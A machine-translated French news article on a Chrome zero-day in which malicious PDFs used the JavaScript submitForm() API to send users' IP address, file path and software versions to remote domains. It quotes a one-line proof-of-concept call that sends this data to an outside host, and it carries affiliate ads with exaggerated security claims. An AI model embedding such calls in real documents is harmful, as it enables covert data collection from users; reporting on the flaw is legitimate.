Un bug de Chrome permet aux pirates de collecter des données utilisateur via des fichiers PDF

  • EdgeSpot a découvert une vulnérabilité zero-day intrigante exploitant des documents PDF dans Chrome.
  • Cette vulnérabilité peut vous nuire en récoltant les données sensibles sur votre PC.
  • Découvrez notre Page Web & Cloud pour plus d'informations sur d'autres outils et services.
  • Si vous êtes intéressé par les navigateurs, nous fournissons de nombreuses informations à leur sujet dans notre Hub des navigateurs.
Un bug de Chrome permet aux pirates de collecter des données utilisateur à partir de vos fichiers PDF
Et si vous utilisiez le meilleur gestionnaire de documents ?
Rendez tous vos documents accessibles et sécurisés grâce à Adobe Acrobat Reader. Cet outil de gestion de documents vous permettra également de signer électroniquement et de créer des formulaires officiels pour vous faire gagner du temps au travail. Obtenez-le pour votre PC et vous pourrez :
  • Ouvrez, imprimez et modifiez tous vos fichiers PDF et autres types de fichiers
  • Remplir les formulaires PDF plus facilement
  • Gardez vos documents essentiels cryptés

Obtenez toutes les applications à un prix spécial !

Le logiciel de gestion de documents n°1 au monde est maintenant à un prix avantageux, alors dépêchez-vous !

Le service de détection d'exploits EdgeSpot a découvert un Chrome vulnérabilité zero-day exploitant des documents PDF.

La vulnérabilité permet aux attaquants de récolter des données sensibles en utilisant des documents PDF malveillants ouverts dans Chrome.

Dès que la victime ouvre les fichiers PDF respectifs dans Google Chrome, un programme malveillant commence à fonctionner en arrière-plan en collectant des données utilisateur.

Les données sont ensuite transmises au serveur distant contrôlé par les pirates. Vous vous demandez peut-être quelles données sont aspirées par les attaquants, ils ciblent les données suivantes sur votre PC :

  • adresse IP
  • Chemin complet du fichier PDF sur le système
  • Versions du système d'exploitation et de Chrome

Méfiez-vous des fichiers PDF infectés par des logiciels malveillants

Experts Pointé que l'un des deux domaines readnotify[.]com ou alors collaborateur burp[.]net recevait les données.

Ils ont révélé que les attaquants utilisaient le this.submitForm() API Javascript PDF pour collecter les informations sensibles des utilisateurs.

Nous l'avons testé avec un PoC minimal, un simple appel API comme this.submitForm(‘ http://google.com/test’) obligera Google Chrome à envoyer les données personnelles à google.com.

Ce bug de Chrome était exploité par deux ensembles distincts de fichiers PDF malveillants, tous deux diffusés en octobre 2017 et septembre 2018, respectivement.

Notamment, les données collectées peuvent être utilisées par les attaquants pour affiner les attaques à l'avenir. Les rapports suggèrent que le premier lot de fichiers a été compilé à l'aide du service de suivi PDF de ReadNotify.

Les utilisateurs peuvent utiliser le service pour garder une trace des vues des utilisateurs. EdgeSpot n'a partagé aucun détail concernant la nature du deuxième ensemble de fichiers PDF.

Petite astuce: remplacez votre navigateur par Opera

En ces temps troublés, nous sommes attaqués par des logiciels malveillants, du phishing et des chevaux de Troie à chaque étape, nous devons donc être beaucoup plus vigilants et rester protégés.

Et comme il s'agit d'un problème spécifique à Chrome, vous pouvez éviter cette menace et toutes les autres avec un navigateur orienté sécurité comme Opéra.

Ce navigateur est livré avec un bloqueur de publicités intégré qui non seulement efface ces distractions, mais bloque également des scripts d'analyse, des pixels de suivi et des méthodes pour collecter vos données.

Et si vous voulez être absolument sûr de rester à l'écart de tout danger, placez-vous derrière le VPN service 100 % gratuit à utiliser pour une durée illimitée.

Opéra

Opéra

Opera offre la protection parfaite contre les menaces avec le bloqueur de publicités intégré et le service VPN gratuitement !

Obtenir gratuitement
Visitez le site Web

Comment puis-je rester protégé contre les vulnérabilités PDF ?

Télécharger Adobe Acrobat PRO

Adobe Acrobat PRO

Adobe et Chrome font bon ménage lorsqu'il s'agit de gérer les fichiers PDF. En installant l'extension Adobe pour Chrome, vous pouvez réviser et manipuler des fichiers PDF à votre guise sans quitter votre navigateur préféré.

Malgré sa structure robuste, les logiciels malveillants cachés dans les fichiers PDF peuvent ne pas être détectés si vous utilisez la version standard du Reader.

La version professionnelle est recommandée pour garantir votre protection et garder vos données à l'abri des pirates.

Bien que ce ne soit pas gratuit, le prix que vous paierez est plutôt faible pour la pléthore de fonctionnalités supplémentaires que vous apprécierez, notamment la sécurité renforcée de vos fichiers PDF.

Un essai gratuit de 7 jours est également inclus afin que vous puissiez avoir un avant-goût de l'expérience Pro complète avant de faire l'achat.

Adobe Acrobat PRO

Adobe Acrobat PRO

Éloignez-vous des logiciels malveillants en téléchargeant Adobe Acrobat PRO. Il a beaucoup plus de fonctionnalités que la version gratuite et protège vos données.

Essai gratuit
Visitez le site Web

Si vous souhaitez être en sécurité lorsque vous surfez sur Internet, vous aurez besoin d'un outil entièrement dédié pour sécuriser votre réseau. Installer l'accès Internet privé maintenant et sécurisez-vous. Il protège votre PC des attaques lors de la navigation, masque votre adresse IP et bloque tous les accès indésirables.

Le service de détection d'exploits EdgeSpot souhaitait alerter les utilisateurs de Chrome sur les risques potentiels car le correctif ne devait pas être publié dans un avenir proche.

EdgeSpot a signalé à Google la vulnérabilité l'année dernière et la société a promis de publier un correctif fin avril.

Cependant, vous pouvez envisager d'utiliser une solution de contournement temporaire au problème en affichant localement les documents PDF reçus à l'aide d'une autre application de lecture.

Alternativement, vous pouvez également ouvrir vos documents PDF dans Chrome en déconnectant vos systèmes d'Internet.

Questions fréquemment posées

  • Oui. Mais si vous voulez un choix plus large, explorez nos meilleurs choix pour Chromeintimité extensions dans ce guide complet.

  • Tvoici de nombreuses extensions qui permettent PDF En traitement. Vérifier sur notre excellent guide sur les meilleures extensions PDF pour Chrome.

  • Ce n'est pas le cas, mais vous pouvez l'activer rapidement. Voici notre guide complet sur la façon d'activer le générateur de code QR dans Chrome.

Votre mot de passe est-il sûr? Statistiques de mot de passe que vous ne connaissiez pas

Votre mot de passe est-il sûr? Statistiques de mot de passe que vous ne connaissiez pasLa Cyber Sécurité

Des statistiques pour s'interroger sur la force de votre mot de passeCréer un mot de passe fort est la première étape vers la sécurisation de vos comptes en ligne. Les utilisateurs ne mettent génér...

Lire la suite
Statistiques à connaître sur les cyberattaques en 2023

Statistiques à connaître sur les cyberattaques en 2023La Cyber Sécurité

Plongez dans quelques statistiques importantes sur la cybersécuritéLes secteurs de la santé et de l'éducation ont été les plus vulnérables aux cyberattaques au cours des dernières années.Nous assis...

Lire la suite
Comment activer ou désactiver la protection contre les falsifications sur Windows 10

Comment activer ou désactiver la protection contre les falsifications sur Windows 10Guide De Windows 10Problèmes De Windows DefenderLa Cyber Sécurité

Apprenez à gérer cette fonctionnalité sur votre appareilLa protection antialtération est une fonction de sécurité qui protège votre appareil Windows 10.Vous pouvez l'activer ou le désactiver manuel...

Lire la suite